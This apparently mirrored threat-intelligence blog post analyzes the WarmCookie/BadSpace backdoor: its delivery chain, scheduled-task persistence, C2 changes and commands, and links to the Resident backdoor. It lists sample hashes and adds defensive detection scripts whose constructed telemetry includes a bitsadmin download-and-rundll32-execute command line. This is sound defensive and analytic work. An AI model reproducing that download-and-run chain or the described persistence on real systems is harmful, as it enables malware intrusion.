2024-10-23 WarmCookie/BadSpace - APT TA866 - Samples
2024-10-29 11:22 Author: contagiodump.blogspot.com (view original)

 2024-10-23 TALOS Threat Spotlight: WarmCookie/BadSpace

Summary: WarmCookie, also known as BadSpace, is a backdoor first observed in April 2024 and distributed mainly through malspam and malvertising. It gives the operators long-term access to compromised hosts and is used to stage follow-on payloads such as CSharp-Streamer-RAT and Cobalt Strike. Its infection chains and code share notable traits with the Resident backdoor, pointing to possible common authorship by TA866.

WarmCookie's infection chain starts with email lures (typically invoice or job agency themes) that lead victims to servers hosting malicious JavaScript. The obfuscated JavaScript downloader, usually delivered inside a ZIP archive, runs a PowerShell command that uses Bitsadmin to fetch the WarmCookie DLL and then executes it; the DLL then sets up its own persistence.
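The chain above (PowerShell, then Bitsadmin fetching a DLL, then rundll32 loading that same DLL) is the kind of parent/child plus file-path correlation an EDR or SIEM rule can catch. The following is an added example, not code from the post or from Talos: it correlates constructed Sysmon-style process-creation events, matching a PowerShell-launched bitsadmin /transfer whose destination .dll path reappears on a rundll32 command line. The event fields, paths, the documentation IP 203.0.113.10 and the export ordinal are assumptions made for the sample.

```python
"""Detection sketch for the delivery chain: PowerShell spawning bitsadmin to
download a DLL, then rundll32 loading that same DLL.
The events below are constructed for this example (Sysmon-style process-creation
fields are an assumption); paths, IPs and job names are hypothetical."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # full command line


# Windows path ending in .dll; stops at whitespace, quotes and commas
# (rundll32 syntax is "path.dll,Export", so the comma must not be swallowed).
DLL_PATH_RE = re.compile(r'([A-Za-z]:\\[^\s",]+\.dll)', re.IGNORECASE)


def _basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_delivery_chain(events):
    """Return (bitsadmin_event, rundll32_event) pairs where a PowerShell-launched
    bitsadmin /transfer wrote a .dll that rundll32 later loaded."""
    by_pid = {e.pid: e for e in events}
    downloaded = {}  # lower-cased DLL path -> bitsadmin event that fetched it
    for e in events:
        if _basename(e.image) != "bitsadmin.exe" or "/transfer" not in e.cmdline.lower():
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or _basename(parent.image) not in ("powershell.exe", "pwsh.exe"):
            continue
        for path in DLL_PATH_RE.findall(e.cmdline):
            downloaded[path.lower()] = e
    hits = []
    for e in events:
        if _basename(e.image) != "rundll32.exe":
            continue
        for path in DLL_PATH_RE.findall(e.cmdline):
            if path.lower() in downloaded:
                hits.append((downloaded[path.lower()], e))
    return hits


# Constructed sample telemetry (not real WarmCookie telemetry); 203.0.113.10 is a
# documentation address and the DLL path / export ordinal are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(400, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(512, 400, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\alice\Downloads\invoice.js"'),
    ProcEvent(640, 512, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -nop -c <obfuscated>"),
    ProcEvent(700, 640, r"C:\Windows\System32\bitsadmin.exe",
              r"bitsadmin /transfer upd /download /priority normal "
              r"http://203.0.113.10/f.bin C:\ProgramData\upd\w.dll"),
    ProcEvent(820, 640, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\ProgramData\upd\w.dll,#1 /u"),
    # benign rundll32 use that must not be flagged
    ProcEvent(900, 400, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for bits, rundll in find_delivery_chain(SAMPLE_EVENTS):
        print(f"pid {bits.pid} fetched DLL; pid {rundll.pid} loaded it: {rundll.cmdline}")
```

Keying on the downloaded DLL path rather than on bitsadmin alone keeps the rule quiet on legitimate BITS use; a variant that calls Start-BitsTransfer directly from PowerShell would need the destination recorded from the PowerShell command line or from file-create telemetry instead.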

Persistence: WarmCookie uses Task Scheduler for persistence. The DLL is placed in a directory under %ALLUSERSPROFILE% (the post also names %ALLDATA%, which is not a standard Windows environment variable) and a scheduled task re-launches it after a 60-second delay. The latest version changes the command-line switch passed at execution from /p to /u.
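To hunt for this persistence on a host, export the task definitions (schtasks /query /xml, or Export-ScheduledTask in PowerShell) and inspect the action and trigger. The check below is an added example, not the post's or Talos's code: it parses a constructed Task Scheduler XML definition and flags rundll32 actions that load a DLL under C:\ProgramData (what %ALLUSERSPROFILE% expands to on current Windows) with a /p or /u switch, reporting the trigger delay as context. The task contents, DLL path and export ordinal are placeholders; only the schema namespace is the real one.

```python
"""Hunt exported Task Scheduler XML for WarmCookie-style persistence: rundll32
launching a DLL that lives under %ALLUSERSPROFILE% (C:\\ProgramData), with the
/p or /u switch, plus a trigger delay. The task XML below is constructed for
this example; only the schema namespace is the real Task Scheduler one."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
DLL_PATH_RE = re.compile(r'([A-Za-z]:\\[^\s",]+\.dll)', re.IGNORECASE)
SWITCH_RE = re.compile(r'(?:^|\s)/[pu](?:\s|$)', re.IGNORECASE)


def parse_task(xml_text):
    """Return ([(command, arguments), ...], delay) from a task definition."""
    root = ET.fromstring(xml_text)
    actions = []
    for ex in root.findall(".//t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS).strip()
        args = ex.findtext("t:Arguments", default="", namespaces=NS).strip()
        actions.append((cmd, args))
    delay = root.findtext(".//t:Delay", default="", namespaces=NS).strip()
    return actions, delay


def task_findings(actions, delay, programdata=r"C:\ProgramData"):
    """Reasons a task looks like WarmCookie persistence; empty list if clean.
    programdata is a parameter (not read from %ALLUSERSPROFILE%) so the check
    also runs on XML exported from another machine."""
    reasons = []
    prefix = programdata.rstrip("\\").lower() + "\\"
    for cmd, args in actions:
        if cmd.replace("/", "\\").rsplit("\\", 1)[-1].lower() != "rundll32.exe":
            continue
        m = DLL_PATH_RE.search(args)
        if m and m.group(1).lower().startswith(prefix):
            reasons.append("rundll32 loads a DLL under ProgramData: " + m.group(1))
        if SWITCH_RE.search(args):
            reasons.append("launch switch /p or /u as used by WarmCookie")
    if reasons and delay:
        reasons.append("trigger delay " + delay)
    return reasons


# Constructed task definitions (placeholders, not exported from a real infection).
SUSPICIOUS_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <RegistrationTrigger>
      <Delay>PT1M</Delay>
    </RegistrationTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\rundll32.exe</Command>
      <Arguments>C:\ProgramData\upd\w.dll,#1 /u</Arguments>
    </Exec>
  </Actions>
</Task>"""

BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger/></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\rundll32.exe</Command>
      <Arguments>C:\Windows\System32\shell32.dll,Control_RunDLL</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml_text in (("suspicious", SUSPICIOUS_TASK_XML), ("benign", BENIGN_TASK_XML)):
        print(name, task_findings(*parse_task(xml_text)))
```

The delay (PT1M is 60 seconds in the ISO 8601 form Task Scheduler uses) is reported only alongside a stronger reason, since delayed triggers are common in legitimate tasks; the DLL-under-ProgramData and /p or /u conditions carry the signal.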

Command-and-Control (C2) Adaptation: Earlier WarmCookie samples used a distinctive, easily detected C2 User-Agent string (e.g., Mozilla/4.0 (compatible; MSIE 6.0…)); newer samples use a current browser string (Mozilla/5.0… Firefox/115.0) so that the traffic blends in, and User-Agent matching alone no longer isolates it.
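What this means for detection: the old User-Agent is a high-confidence indicator on its own, while the new one is a genuine Firefox 115 ESR string that matches legitimate traffic. The script below is an added example, not from the post or Talos: it scores constructed proxy log lines, matching the legacy string on the prefix the post gives and treating the Firefox/115.0 string as only a medium finding when paired with a weak second signal (the destination is a bare IP or is contacted by few clients). That pairing heuristic and the log layout are assumptions; the full legacy UA in the sample is a generic IE6 string, since the post gives only the prefix.

```python
"""Score proxy log lines for the WarmCookie C2 user-agent change.
The old MSIE 6.0 string is a high-confidence match on its own; the newer
Firefox/115.0 string is a normal browser UA, so it only earns a finding when
combined with another weak signal. Log lines and the log layout (timestamp,
client, destination host, quoted User-Agent) are constructed for this example;
the 'bare-IP or rarely contacted destination' heuristic is a generic assumption."""
import re
from collections import defaultdict

# Only the prefix is given in the text above; the sample lines use a generic IE6 string.
LEGACY_UA_PREFIX = "Mozilla/4.0 (compatible; MSIE 6.0"
BLENDED_UA_MARK = "Firefox/115.0"

LINE_RE = re.compile(r'^(?P<ts>\S+) (?P<client>\S+) (?P<host>\S+) "(?P<ua>[^"]*)"$')
IPV4_RE = re.compile(r'^\d{1,3}(?:\.\d{1,3}){3}$')


def parse_line(line):
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def score(lines, rare_threshold=3):
    """Return (severity, client, host, reason) tuples, in log order."""
    records = [r for r in map(parse_line, lines) if r]
    clients_per_host = defaultdict(set)
    for r in records:
        clients_per_host[r["host"]].add(r["client"])
    findings = []
    for r in records:
        ua, host = r["ua"], r["host"]
        if ua.startswith(LEGACY_UA_PREFIX):
            findings.append(("high", r["client"], host,
                             "legacy MSIE 6.0 User-Agent used by earlier WarmCookie C2"))
        elif BLENDED_UA_MARK in ua:
            bare_ip = bool(IPV4_RE.match(host))
            rare = len(clients_per_host[host]) < rare_threshold
            if bare_ip or rare:
                why = "bare-IP" if bare_ip else "rarely contacted"
                findings.append(("medium", r["client"], host,
                                 f"Firefox/115.0 User-Agent to {why} destination "
                                 "(the UA alone is not distinctive)"))
    return findings


# Constructed log lines; 203.0.113.10 is a documentation address.
SAMPLE_LOG = [
    '2024-10-23T10:00:01Z 10.0.0.5 203.0.113.10 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"',
    '2024-10-23T10:00:09Z 10.0.0.7 203.0.113.10 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"',
    '2024-10-23T10:00:12Z 10.0.0.8 www.example.com "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"',
    '2024-10-23T10:00:15Z 10.0.0.9 www.example.com "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"',
    '2024-10-23T10:00:20Z 10.0.0.11 www.example.com "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"',
]

if __name__ == "__main__":
    for sev, client, host, reason in score(SAMPLE_LOG):
        print(f"[{sev}] {client} -> {host}: {reason}")
```

Once the UA is a real browser string, the useful signals move to request shape and destination reputation; the rarity count here is a stand-in for whatever prevalence data the proxy or NDR platform already keeps.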

Self-Updating Mechanism: A first implementation of a self-update command lets WarmCookie fetch a new build from its C2 server, although the feature appears incomplete.

C2 Command Updates

The latest WarmCookie samples feature new C2 commands:

Command 0x8: Receives a DLL from C2, assigns it a temporary filename, and executes it.

Command 0xA: Similar to Command 0x8 but adds hardcoded parameters, allowing self-updating.

Command 0xB: Moves the malware binary to a new temporary filename, deletes the scheduled task (removing persistence), and terminates the malware process.

Code and Function Similarities to Resident Backdoor

A code-level comparison between Resident backdoor and WarmCookie shows:

RC4 Decryption Consistency: Both use identical RC4 implementations and the same mutex management, often using GUID-like strings as mutex names.

Startup Logic: Both determine whether they are running as a DLL or an EXE in the same way, and both establish persistence with scheduled tasks that launch the DLL via rundll32.exe.

Coding Conventions: Functions, parameter passing, and persistence mechanisms align closely, suggesting shared development practices or authorship.
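Because the two families share an RC4 routine, an analyst who has pulled a key and an encrypted blob out of one sample can check material from the other with the same decryptor. Below is textbook RC4 (key scheduling plus keystream generation), added here as an example; it is not WarmCookie's or Resident's code. It is paired with a regex that pulls GUID-shaped strings, the mutex-name pattern mentioned above, out of the decrypted result. The key, mutex name and C2 address in the sample blob are constructed placeholders.

```python
"""Textbook RC4 (KSA + PRGA) and a GUID-like string scanner, for checking a
key/blob pair recovered from a sample. Not WarmCookie's or Resident's own code;
the key, mutex name and address in the sample blob are constructed placeholders."""
import re


def rc4(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt data with RC4 (the operation is symmetric)."""
    # Key-scheduling algorithm
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    # Pseudo-random generation algorithm, XORed over the input
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


# Matches {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}, with or without braces
GUID_LIKE_RE = re.compile(
    r'\{?[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}\}?')


def guid_like_strings(blob: bytes):
    """GUID-shaped strings in a decrypted blob, e.g. candidate mutex names."""
    return GUID_LIKE_RE.findall(blob.decode("latin-1"))


def decrypt_and_hunt(key: bytes, blob: bytes):
    """Decrypt an RC4 blob and list any GUID-like strings it contains."""
    plain = rc4(key, blob)
    return plain, guid_like_strings(plain)


# Constructed configuration blob: a placeholder mutex name and C2 address,
# RC4-encrypted with a placeholder key (none of these come from a real sample).
SAMPLE_KEY = b"example-key-0001"
SAMPLE_PLAIN = b"Global\\{0a1b2c3d-4e5f-6071-8293-a4b5c6d7e8f9}\x00203.0.113.10\x00"
SAMPLE_BLOB = rc4(SAMPLE_KEY, SAMPLE_PLAIN)

if __name__ == "__main__":
    plain, guids = decrypt_and_hunt(SAMPLE_KEY, SAMPLE_BLOB)
    print(plain)
    print("GUID-like strings:", guids)
```

The standard RC4 test vectors (key "Key" over "Plaintext" gives BBF316E8D940AF0AD3) are a quick way to confirm that a routine recovered from a sample really is unmodified RC4 before trusting its output; a family-specific tweak to the key schedule or output would fail them.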

File Information

  • ├── 0b26abc692b7a2877b6b6fce6aa99b29af125b063f1c41b507362def59f8dfce
  • ├── 0c9697506df18baac4b4215e78a43926ea4bb94ea3607c851a1c2fe3b5b31f17
  • ├── 0d2cf14d27586ff9da5832e0efaba872a1641617fdb4a47d94b645172f7d2fa6
  • ├── 0d305291091bcb0c943c6472dce450272b2291b6287a053c5c553f082654c718
  • ├── 0d59c9bef911c879011f21163a083c09b759c9757f1ade9da9f87fdce27dc5f4
  • ├── 0da87bff1a95de9fc7467b9894a8d8e0486dfd868c2c7305e83951babacde642
  • ├── 0f11caad7cd5cf4de78145a13590fb50a42a63aaf3bbc6066d2a0bb58a2068f7
  • ├── 124e2b15b001eb302f0a5f43604621a001d250d42afdf353dc812f41bf249a55
  • ├── 13142aa3c815362511acee0b74672081d7bb8cd3cabd8ab4c85fb7ba8126aec5
  • ├── 13ccffd00e2fa89167e29a8d382d8c417e198ffce8684df23e4a8a91fdc0f23e
  • ├── 15b1eb1072de7e16d5b7693a16269b315c0926558fa2cbbcd2948c2dd16ab8a0
  • ├── 193cadbea116833efaaa0bc6fbea552a68c9694fb0177ad873d702001b4cef8d
  • ├── 1bcfed8b593a8a7c8b34e074aca3d4fc68a0ea3343b32eae89fdabf35ad40e7d
  • ├── 1d9f4690a62fd4d17c031924585b1e46e417d8c72f331ba51cf0eceeb91f6579
  • ├── 1dd740062b30ce02e90238d55cb6f786496e120a40e93334fef7033e75d46d79
  • ├── 1ea681b79f88c2f0e9344beedb8776643d735c3f8251479c9495537c40fe5ba1
  • ├── 283cd2138b4f1ffef36411adee02f5d684593bdf3117c760ade04e19c958028a
  • ├── 295d01d02376044ec078128788b4439eba63184147f0137852160952ad1649c2
  • ├── 2a311dd5902d8c6654f2b50f3656201f4ceb98c829678834edaeae5c50c316f5
  • ├── 2a4451ef47b1f4b971539fb6916f7954f80a6735cf75333fa9d19b169c31de2e
  • ├── 2a5a12cc4ef2f0f527cc072243aa27d3e95e48402ef674e92c6709dc03a0836a
  • ├── 2cbd9f49b2dec8a36e0961b5471bdb3266a5c061ba8784e14a193e700d156a0c
  • ├── 2f434cc508baac8440e95e955306ee354e76680eedca4a3ec2d87f592cfdcba7
  • ├── 30a85fa1bf6df41d841efbf986beb286eb829380ebfdf0c1ac694f3d4f24315a
  • ├── 32ff6653fb6e4757c1f7206af26475445e1e43c8e1db0af5309ad8a9c4d86ba1
  • ├── 33f81ee6d9747afe1c7c5a6ed741822749ea42bb297eb642f720fd44ae35e786
  • ├── 34f2fc85932f6fede57846cf2a2d55172d28e4a251bb4434a88a02ce8ec030f0
  • ├── 38f4b197dcda32b14dc98127e3a523364822e108f85153105b77b85ce31438d7
  • ├── 3f073189506b7ca07fb352e267699688bd3a6c11cde72217ec1ffbae211b6e15
  • ├── 40cdac6696e84f677d7e4817fd85f32da0f9256866bb85a25da207e3d5ca7d5c
  • ├── 41d9d1e0599b492fdb6fa2ce47f0094112799830dd8dc1c098690a500a8fa6b1
  • ├── 425da6a7bd4faedc97990c6458d5e6a0635839037a99611385b77b43b443d1ec
  • ├── 43b87cf9b5a73d9bdfdbd9e1da3cb4d1e26a509d328a90c01cc0025a9cb1698f
  • ├── 44faed020d5d8b29918a3f02d757b2cfada67574cf9e02748ea7f75ba5878907
  • ├── 475edfbb2b03182ef7c42c1bc2cc4179b3060d882827029a6e67c045a0c1149b
  • ├── 48320e88c9188d97e7f6a06eddcc8e1f89cf79ed66b68a546cd38e76f183b13e
  • ├── 48640e2fb35f073c22937784f32c157d9a0781d61a2293f73fc3566b708205bd
  • ├── 4b4e27824cd349192cf0913060f1481a192f2b13d44e2787edbe8d7f0c57fa06
  • ├── 4cccc2d7f97a78dd0ef3f06a2fdb555299cd06c4222dd546d87a4ed735743d48
  • ├── 4e731e9e0233d53c70830011690f59b0764f61aa19e49cd10bed92b6eb81762c
  • ├── 4ff20a31223f3c0a04f1646332979c89fce5111f9d288b69568c9120d13c564c
  • ├── 53db2f135883d74dcac2e620d14d7f775876bf49d3d5d4fdb131f8fed4917434
  • ├── 5428e75adfc1f8d9b551f0e912db89c9f82db0bb574a80553b2ee8a829668d18
  • ├── 55ace018a6c4f355511ce3f6833d4b997d4323afb890520dc815aa2f916499f3
  • ├── 5649dcd896bf2155e790c5f05b9fa2ba6fe5befcac85a8cb0beed23945686e02
  • ├── 56984cac7431ef001246350eaa6011cf2f34571e231b29572d27f962f6c7f165
  • ├── 56f9bd572b3d7c65da3d50d77a71fec0f8b4320f7bf7f691221522ac62e5d99b
  • ├── 5970ba228d2afe2031b8e8c17ba284746ebb9066f0ccb8e1fe33a6e3927a6c97
  • ├── 5ab9b4e3f15a04bfe240368d9cea4e6fccbf88c89358e9316055e3f79ca10fd7
  • ├── 5b360b6855e87f173b4429adcca1d5f7735112119d69a5e9268673ab5ac82394
  • ├── 5ca2106d823eeee827f228b8a1caf6e769ce7cefea6da72f537e2e302f10f13b
  • ├── 5cd47f178fd5afc2c290c77695277183df54d886f444f5993bbbe169eb3e2b12
  • ├── 60a43c829aaf03c42d012c0f61501e87864c19896d43f61f990d5be9a822eb9b
  • ├── 60cd63e288c4054f85c9ea8167e0e58c1bd9998a15e3f8ed211132b42f76bdb6
  • ├── 613e6a8a49a61f157a8e064b7fbc7bd5d59909d47e31f6c18cd5c5659808ee89
  • ├── 616b1e1127902cef942cbc8ba6b89fe2e3090e992c7ae5e08c7d54b508b0caab
  • ├── 62a653ff8e81f7ed05a1415a2ea679a993d5c1b0abd0ea93aff82dc10142629f
  • ├── 62fb7f43c677ee2fe56406e7af8876289d3751e7c001aa627dd287baf5687f06
  • ├── 63537e464742099cfaf06904676e8955c0543a621e1936297e49090587a84ac1
  • ├── 668e1270bdb9a3aba41389777fc1ccd8759ad1316c62ea7c3f711925b44ef0b6
  • ├── 669e721ddb304f09ad60a7e166710a08e37a42f6a8cd5bc47a21fa0342292507
  • ├── 676cbcaa74ee8e43abaf0a2767c7559a8f4a7c6720ecc5ae53101a16a3219b9a
  • ├── 67984703c89ee30cadaa8d7dd5c1a0e9f7f5d096ab0d6d03fdb01115780fa7c3
  • ├── 6a195e6111c9a4b8c874d51937b53cd5b4b78efc32f7bb255012d05087586d8f
  • ├── 6ac099ab5132a17bf7a492b47442f0f6776eb76d702a5c2d947dab0ab33cfc45
  • ├── 6c41faafcf01000547c1e327c7366a89b4d5f9e64de2da404c34954990f7e1fa
  • ├── 6cd8a62fb051c17da53b46bc05c6407eab58582c531f8dd18553ecd2b3b37411
  • ├── 6db0d6eaff5279d815e66e1abbdd7e4159c58c7747b158659d875c369c153b89
  • ├── 6fb83280ffc0feddf3f346a4d3a8914f26c097b8aef3a276590ea44ce9d70204
  • ├── 71053c8a336c10154dadd4572c00e45e177b2f29470bd7171b28e49ab855def0
  • ├── 712738c0afe1d10f28b6aefecb44f2bc442007fdd65f8f07582120e3ec22d590
  • ├── 748e247912e4f40c685c4b756cd9bfbc39c7b3fcd649cd85f83c67c4cdd8a62d
  • ├── 770cafb3fe795c2f13eb44f0a6073b8fe4fb3ee08240b3243c747444592d85ff
  • ├── 7b340050fe9bec7024092de63d223d2a96a32d14676f6c82c9024278ae0b323e
  • ├── 7b7dbd54308cacec5c591dbd6a2b9f90368f986572c3edcbfedca7812b409347
  • ├── 7c49024676be4f90d905028675d4a714311f971c099ab01e3cd26cd13c68499c
  • ├── 8087f6755ef54c99000517a5bf5a94ceeb43ee34d2774051c616b51e8d827e0a
  • ├── 824438852f5f11bef8a60df08f6746abf869c52e288456f4cefb97910ae2fcd7
  • ├── 83218a0beee310a8056ca62946a5f8ca742787e49cf2b4f93e29c4940d3961c9
  • ├── 84519a45da0535087202b576391d1952a4cc81213f0e470db65f1817b65ee9d7
  • ├── 87ce3aaf800b7a80f82d38fd6ff60925814dbe611786c29040bc9fcfa9943fd3
  • ├── 87f57a7a4b4c83ecb3cdd5f274c95cd452c703de604f68aff6e59964b662e3f8
  • ├── 8d81f6af61f019c56ade65dc80a8b8332f8d141fa11714bc2f5594242661d8a3
  • ├── 8e8cebab33731844245e5f70e90933c37a19010bf893027ad7af2a92e1d56244
  • ├── 8f7b7f3da174d8ff41b2bc86e363d00d198d79cf52de078a3a5f6b55352bceb8
  • ├── 90b85d2ca44186de6df202abf27e3737c52691bf5dd28841fba8860bdc4483f8
  • ├── 927e941acb5bc42ff2050ad04fdb6e21d33f9b02cb3fc279dfee2f814557d8e5
  • ├── 95831ac07e5f732817af71fc4a9f33b707a656078cff6a58042bbd07bdb9bbbd
  • ├── 959098a5c53f7a16fa644152aa4ffe52a989b24c1c5f87a23ae74719aab82238
  • ├── 962e21e349a00ef86d1c094b7ef6e80a5c99b98c1165f3fc318a55deff25731f
  • ├── 975deab236438b6d7fa3ad1be7d9c2a3fabbd6103ff5f8b7fe536205ad715508
  • ├── 9a27a2ad96f7676d28f99ffc4cbc51a81b42c7739fc15a0e57295b028d6c830d
  • ├── 9bc4c44b24f4ba71a1c7f5dd1c8135544218235ae58efa81898e55515938da6a
  • ├── 9d143e0be6e08534bb84f6c478b95be26867bef2985b1fe55f45a378fc3ccf2b
  • ├── 9d4c80ea1d6d1ce11f9bb79d7a5a4ddfcea9f20ffe039db7215e9c57fc183476
  • ├── 9e182abd97e46d2788e637b1969deede1821bc08ece40d731ec1051be0b32330
  • ├── a0916d3b97c0df2ec1ed6a772dac27c24842a64d4f6e078c941fa2046cabb9ed
  • ├── a16ec983d5d2d7d4373da2faede5457ee5587b36e5bfd737a6c6d2c42ff7266f
  • ├── a1cb61abc99eb58e30ae7a9908c260be26ce072400ad771532bfe7c039ce10ef
  • ├── a20c9fe2888286473faea909d2f22a75a1b982387b08e2ba0bd091ae631f36fc
  • ├── a5f16fa960fe0461e2009bd748bc9057ef5cd31f05f48b12cfd7790fa741a24e
  • ├── a725883bd1c39e48ab60b2c26b5692f7334a3e4544927057a9ffbdabfeedf432
  • ├── ab8cd83f855445bd9486be0960b2dbb038c313165f2a9eb7cc5eecf96c344be6
  • ├── ad2333e1403e3d8f5d9bd89d7178e85523fa7445e0a05b57fd9bc35547ec0d98
  • ├── b3415b4f3524ac4df8fcff649b986d0ffe3874050bf48f0f1949c745c9e51d46
  • ├── b54b42b4dfb93502646e9e8cb0eb5b65dccf2b872ab79f67641e307a08234b94
  • ├── b6ac7f6e3b03acd364123a07b2122d943c4111ac4786bb188d94eae0e5b22c02
  • ├── b7aec5f73d2a6bbd8cd920edb4760e2edadc98c3a45bf4fa994d47ca9cbd02f6
  • ├── b9278ecce14213a1920ca9cc2b23ee18641c07a2780b693f009dcac578ffef92
  • ├── ba4c8be6a1eb92d79df396eea8658b778f4bc0f010da48e1d26e3fc55d83e9c7
  • ├── bb74c6fc0323956dd140988372c412f8b32735fb0ed1ad416e367d29c06af9cc
  • ├── bfcb215f86fc4f8b4829f6ddd5acb118e80fb5bd977453fc7e8ef10a52fc83b7
  • ├── c36749f11be375b6f103ff973255b6d32ed816ba27c158adea087de7546045da
  • ├── c437e5caa4f644024014d40e62a5436c59046efc76c666ea3f83ab61df615314
  • ├── c64cb9e0740c17b2561eed963a4d9cf452e84f462d5004ddbd0e0c021a8fdabc
  • ├── c6c777beb38120497e6b26fea8f376652eafb5b661c65a87265421dc83f61121
  • ├── c7fc0661c1dabd6efd61eaf6c11f724c573bb70510e1345911bdb68197e598e7
  • ├── c8f3947a5d377064640358cfb0320de30324eb6d66789afaf1e4cd1a8dbb187b
  • ├── cbd7ba0886a3e0d60b15bed0736bfaa130d47ab247e374d79c3612ce6ce049b6
  • ├── ccde1ded028948f5cd3277d2d4af6b22fa33f53abde84ea2aa01f1872fad1d13
  • ├── ccf29931f8bddd1888912ba5def598bf73c29bb20be50e44f60d36e3c0296c8b
  • ├── cd9aebcc686a8a2eb25bf5d75100b28f58aad6512222ade6630bbad59e877369
  • ├── cec5bfbbd96c9a150d740c5be7d1d86c35ade0611085de537b8d1ca4887f2780
  • ├── cee576f6d4d05bfb4f0e0704a4712af10b0afcb369407f5edf3526145a53a685
  • ├── cf2e04d01b3de16d9aaa90c0d95775c9a99e63b23cc42043046ba31725d80e2e
  • ├── cfa312272a7e55330855325925cc449a9ca8f80626d1003b0981c4375fad69a3
  • ├── d20903e4f8635fc8f8a7d1ab2330a61eb1fad29e03c353ede85bc359aa019f2c
  • ├── d4c140b094dd3f278e8b99aa504419d2c2dc9bdb4169dc5eaaf55c187fd2f011
  • ├── d4c955b1db1e499ea47196b8f630205329f9277f3cc184d75a3b69a70d8c49da
  • ├── d596868e19902772b38e91a6421ae72750e02445cdb6d24a9b3e78931c1d1ffd
  • ├── d7cfd49c873810b2f3369af4f8e8d0bac57c83137b1cd173f2f79a8d5f0898b9
  • ├── db7827bb6788f0a7dae5ef2dc0f3c389ab2616fabed27d646b09ecceb7c1eea9
  • ├── ddbcce9bb969bda17064796c25abcc346748e7cd5d9d0460672d8d09ea97d24f
  • ├── de6dbd27a07500e11af05f0420902c4d172aa34f6681d3f1546cf5b5872b3310
  • ├── e04562fb05388e10d6d70d4cadbec059c6c0601f8232d8699ad8a6d3ee0e75d6
  • ├── e2c7fb642d9227013695257561a77f9164f992615082b85fe973dde2934ecf1c
  • ├── e4a9105c3c44cd3f0f975f807127aae121b67c561240fefdce215c715695d5be
  • ├── e640676b0ff2ba116d8cea36cd7103a5897eb29e9c8a297bb8883b83972565a1
  • ├── e79e1858fdd8cb7642f0df4b2f696126df1bd6fc5f4731af8d797e02273f307f
  • ├── e8ca376afa8e85fcd0487c25fd8330455cd2a5ea17aeaed95e9fd085d81035c8
  • ├── e94f9221944a764f220831eb421d4571b32e5b243aad4943b69ae2bcfb176737
  • ├── ebc0ded53cd49db7ea646bd02f391dee05f6093ec26300a7389ae2ef8d769a6f
  • ├── ec4217947c398d6aa335436b8da830e66557031dd1ec152e33093c8cc8466077
  • ├── eca43317ae815a18eeaf723506c960a9b2edc39f127e5a200011e594e0ab31e2
  • ├── eec7ed30a026ba5ba82c288693bb6ad16cfc5643768bb89e5a0b17109d1fc7a6
  • ├── f036314c1ce294070c181bc0bc8af837679b1aeafbf2497799c065cbadc72474
  • ├── f0ce1e9db6418c488beb9be3b205d4c16afbbed6be20eebe8445d9cdbfc23dde
  • ├── f31e28b2fd8efe63a7a2c39f7f87d895c44694d80b5fcbff91d51dc63eafa9dc
  • ├── f4d2c9470b322af29b9188a3a590cbe85bacb9cc8fcd7c2e94d82271ded3f659
  • ├── f57dcff87305797c6488b8a45b2d48c1c119cc19a316f452c04b38e30090477d
  • ├── f7fce1a38543f29336e8ae8ab659370ce21734acb2b5d86426f64143a9e3bf41
  • └── fa02d4d18b61842ab7166d6274e6b941342be58372f2a903e293554bbb07dd45

Over the 15 years the blog has been around, many hosting providers have dropped support because of stricter no-malware policies, which has left broken links, especially in older posts. If you find a broken link on contagiodump.blogspot.com (or contagiominidump.blogspot.com), note the file name from the URL and search for it in the Contagio Malware Storage.


Source: https://contagiodump.blogspot.com/2024/10/2024-10-23-warmcookiebadspace-apt-ta866.html